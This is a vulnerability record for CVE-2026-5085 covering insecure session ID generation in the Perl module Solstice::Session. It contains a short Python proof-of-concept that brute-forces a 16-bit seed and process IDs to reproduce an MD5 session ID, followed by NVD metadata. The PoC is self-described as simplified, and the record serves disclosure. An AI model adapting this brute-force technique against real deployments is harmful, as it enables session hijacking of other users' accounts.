CVE-2026-5085

#!/usr/bin/env python3 # PoC to demonstrate predicting Session ID by brute-forcing the 16-bit rand seed import hashlib import time def simulate_vulnerable_generation(epoch, pid, seed): # Simulate the weak randomness described in the CVE # Note: Hash ref content is predictable in context, simplified here as a constant string hash_ref_content = "Solstice::Hash=SCALAR(0x12345678)" # Simulate rand() with 16-bit seed (simplified logic for demonstration) pseudo_random = str((seed * 1103515245 + 12345) & 0x7FFF) data = f"{epoch}{hash_ref_content}{pseudo_random}{pid}" return hashlib.md5(data.encode()).hexdigest() def attack(target_session_id, epoch, pid_range): print(f"[*] Brute-forcing seed for Session ID: {target_session_id}") # Brute force the 16-bit seed space (0-65535) for pid in pid_range: for seed in range(65536): predicted = simulate_vulnerable_generation(epoch, pid, seed) if predicted == target_session_id: print(f"[+] Found match! PID: {pid}, Seed: {seed}") return True print("[-] Match not found.") return False # Example Usage if __name__ == "__main__": # Assume we know the timestamp (leaked via HTTP Date) and approximate PID current_time = int(time.time()) target = "5d41402abc4b2a76b9719d911017c592" # Example hash attack(target, current_time, range(1, 1000))

{"cve": {"id": "CVE-2026-5085", "sourceIdentifier": "9b29abf9-4ab0-4765-b253-1875cd9b441e", "published": "2026-04-13T07:16:50.543", "lastModified": "2026-04-23T15:02:38.933", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Solstice::Session versions through 1440 for Perl generates session ids insecurely.\n\nThe _generateSessionID method returns an MD5 digest seeded by the epoch time, a random hash reference, a call to the built-in rand() function and the process id.\n\nThe same method is used in the _generateID method in Solstice::Subsession, which is part of the same distribution.\n\nThe epoch time may be guessed, if it is not leaked in the HTTP Date header. Stringified hash refences will contain predictable content. The built-in rand() function is seeded by 16-bits and is unsuitable for security purposes. The process id comes from a small set of numbers.\n\nPredictable session ids could allow an attacker to gain access to systems."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N", "baseScore": 9.1, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 5.2}]}, "weaknesses": [{"source": "9b29abf9-4ab0-4765-b253-1875cd9b441e", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-338"}, {"lang": "en", "value": "CWE-340"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:mcrawfor:solstice\\:\\:session:1440:*:*:*:*:perl:*:*", "matchCriteriaId": "83F100D9-D72B-48D9-9D4A-C1C47B9D19CF"}]}]}], "references": [{"url": "https://metacpan.org/dist/Solstice/source/lib/Solstice/Session.pm#L481", "source": "9b29abf9-4ab0-4765-b253-1875cd9b441e", "tags": ["Product"]}, {"url": "https://metacpan.org/dist/Solstice/source/lib/Solstice/Subsession.pm#L105", "source": "9b29abf9-4ab0-4765-b253-1875cd9b441e", "tags": ["Product"]}, {"url": "https://security.metacpan.org/docs/guides/random-data-for-security.html", "source": "9b29abf9-4ab0-4765-b253-1875cd9b441e", "tags": ["Third Party Advisory"]}, {"url": "http://www.openwall.com/lists/oss-security/2026/04/13/2", "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": ["Mailing List"]}]}}